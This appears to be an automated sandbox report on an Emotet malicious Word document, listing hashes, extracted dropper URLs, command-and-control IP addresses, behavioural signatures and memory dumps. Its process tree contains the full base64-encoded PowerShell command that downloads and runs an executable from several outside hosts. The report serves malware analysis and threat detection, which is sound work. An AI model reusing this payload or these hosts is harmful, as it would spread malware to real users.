Analysis

  • max time kernel
    90s
  • max time network
    94s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    31-07-2020 19:48

General

  • Target

    emotet_e1_d99a1916b1d097d5768cd11a74be70e02974b1de04cd2e5e8585b1a7837cf68a_2020-07-31__194800._doc.doc

  • Size

    169KB

  • MD5

    e8a6a9ae4f872aa76127a5c0cf615c51

  • SHA1

    637756394c724655f8a9be26db62986f65f65db3

  • SHA256

    d99a1916b1d097d5768cd11a74be70e02974b1de04cd2e5e8585b1a7837cf68a

  • SHA512

    ee1069ee51962f896b5824a86fc346ceca7aaa472759b397f0f4f4eaa8dd899c50938177753c08b07ced85cabd7812ad47b32f9781571244db6328f7f7ee5bdd

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://artexproductions.com/cgi-bin/xHdbmk/

exe.dropper

http://whistledownfarm.com/cgi-bin/tlsjw81/

exe.dropper

http://e-motiva.com/wp-admin/bFr531220/

exe.dropper

http://stolkie.net/m/H0LV59574/

exe.dropper

http://www.faccomputer.com/images/5mMAg7bKKK/

Extracted

Family

emotet

C2

73.116.193.136:80

185.94.252.13:443

149.62.173.247:8080

89.32.150.160:8080

185.94.252.12:80

77.90.136.129:8080

83.169.21.32:7080

104.236.161.64:8080

114.109.179.60:80

189.2.177.210:443

68.183.190.199:8080

144.139.91.187:443

185.94.252.27:443

190.181.235.46:80

82.196.15.205:8080

46.28.111.142:7080

181.167.96.215:80

202.62.39.111:80

219.92.13.25:80

191.99.160.58:80

rsa_pubkey.plain

Signatures

  • Blacklisted process makes network request 3 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Emotet Payload 2 IoCs

    Detects Emotet payload in memory.

  • Modifies registry class 280 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Office loads VBA resources, possible macro or embedded object present

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e1_d99a1916b1d097d5768cd11a74be70e02974b1de04cd2e5e8585b1a7837cf68a_2020-07-31__194800._doc.doc"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    PID:1452
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABSAEoARgBDAE4AYgBrAHIAPQAnAFYAQwBXAFYAWgBtAHAAaQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAQwBVAHIAaQBgAFQAWQBQAGAAUgBPAHQAbwBDAE8AbAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAFcARwBGAE0AUQByAHkAcQAgAD0AIAAnADIANwAzACcAOwAkAE0AQQBBAEkARQB6AHUAaAA9ACcASQBVAFgAWgBDAHAAbgB1ACcAOwAkAEQAWQBPAEUAQQBoAGMAcwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAVwBHAEYATQBRAHIAeQBxACsAJwAuAGUAeABlACcAOwAkAEIATABNAFQASQBjAGgAcAA9ACcAQgBHAFMAWABIAGsAYwBlACcAOwAkAEEAUQBXAEUAUQB4AG0AZgA9ACYAKAAnAG4AZQB3AC0AbwAnACsAJwBiAGoAZQAnACsAJwBjAHQAJwApACAAbgBlAHQALgB3AGUAQgBjAEwAaQBlAE4AdAA7ACQAUQBBAEkATABXAGcAcQBuAD0AJwBoAHQAdABwADoALwAvAGEAcgB0AGUAeABwAHIAbwBkAHUAYwB0AGkAbwBuAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwB4AEgAZABiAG0AawAvACoAaAB0AHQAcAA6AC8ALwB3AGgAaQBzAHQAbABlAGQAbwB3AG4AZgBhAHIAbQAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAHQAbABzAGoAdwA4ADEALwAqAGgAdAB0AHAAOgAvAC8AZQAtAG0AbwB0AGkAdgBhAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBiAEYAcgA1ADMAMQAyADIAMAAvACoAaAB0AHQAcAA6AC8ALwBzAHQAbwBsAGsAaQBlAC4AbgBlAHQALwBtAC8ASAAwAEwAVgA1ADkANQA3ADQALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBmAGEAYwBjAG8AbQBwAHUAdABlAHIALgBjAG8AbQAvAGkAbQBhAGcAZQBzAC8ANQBtAE0AQQBnADcAYgBLAEsASwAvACcALgAiAFMAUABsAGAAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAUQBBAEIAQwBTAHUAcwBpAD0AJwBZAEQAVABGAE0AcwBtAGgAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYASwBPAFgAVABiAGUAZAAgAGkAbgAgACQAUQBBAEkATABXAGcAcQBuACkAewB0AHIAeQB7ACQAQQBRAFcARQBRAHgAbQBmAC4AIgBkAGAAbwB3AE4AbABPAEEAZABGAGAAaQBgAGwARQAiACgAJABWAEsATwBYAFQAYgBlAGQALAAgACQARABZAE8ARQBBAGgAYwBzACkAOwAkAEkAUwBSAFkAQgBvAHAAdAA9ACcAWgBMAE0ATQBXAHkAZAB3ACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQARABZAE8ARQBBAGgAYwBzACkALgAiAGwAZQBgAE4AZwBUAGgAIgAgAC0AZwBlACAAMwA1ADQAMgAxACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBjAGAAUgBlAGEAVABFACIAKAAkAEQAWQBPAEUAQQBoAGMAcwApADsAJABZAFMAUwBCAEEAcQBqAG0APQAnAFYAVABBAEwAWgBvAHUAbAAnADsAYgByAGUAYQBrADsAJABTAFkATgBOAFoAdABzAHgAPQAnAEwARwBVAEIAUQB5AGwAagAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABRAFEAUQBIAFMAYgB5AHgAPQAnAFkAWgBOAFkAQwBuAGoAZAAnAA==
    1⤵
    • Blacklisted process makes network request
    • Process spawned unexpected child process
    • Suspicious behavior: EnumeratesProcesses
    • Drops file in System32 directory
    • Suspicious use of AdjustPrivilegeToken
    PID:1520
  • C:\Users\Admin\273.exe
    C:\Users\Admin\273.exe
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    PID:268
    • C:\Windows\SysWOW64\sdohlp\dmdskres.exe
      "C:\Windows\SysWOW64\sdohlp\dmdskres.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: EnumeratesProcesses
      • Executes dropped EXE
      PID:1144

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/268-192-0x0000000000300000-0x000000000030C000-memory.dmp

    Filesize

    48KB

  • memory/1452-87-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-14-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-5-0x000000000BAE0000-0x000000000BAE4000-memory.dmp

    Filesize

    16KB

  • memory/1452-89-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-9-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-11-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-13-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-91-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-15-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-16-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-18-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-20-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-22-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-24-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-26-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-28-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-30-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-32-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-34-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-36-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-38-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-40-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-42-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-44-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-46-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-48-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-50-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-52-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-53-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-93-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-55-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-56-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-57-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-59-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-61-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-63-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-65-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-67-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-69-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-71-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-73-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-75-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-77-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-79-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-81-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-83-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-85-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-2-0x00000000096A0000-0x00000000096A4000-memory.dmp

    Filesize

    16KB

  • memory/1452-6-0x000000000CB60000-0x000000000CB64000-memory.dmp

    Filesize

    16KB

  • memory/1452-3-0x0000000007E30000-0x0000000008030000-memory.dmp

    Filesize

    2.0MB

  • memory/1452-54-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-95-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-97-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-99-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-101-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-103-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-105-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-107-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-109-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-111-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-113-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-115-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-117-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-119-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-121-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-123-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-125-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-127-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-129-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-131-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-133-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-135-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-137-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-139-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-141-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-143-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-145-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-147-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-149-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-151-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-153-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-155-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-157-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-159-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-161-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-163-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-165-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-167-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-169-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-171-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-173-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-175-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-177-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-179-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-181-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-183-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-185-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-187-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/1452-189-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB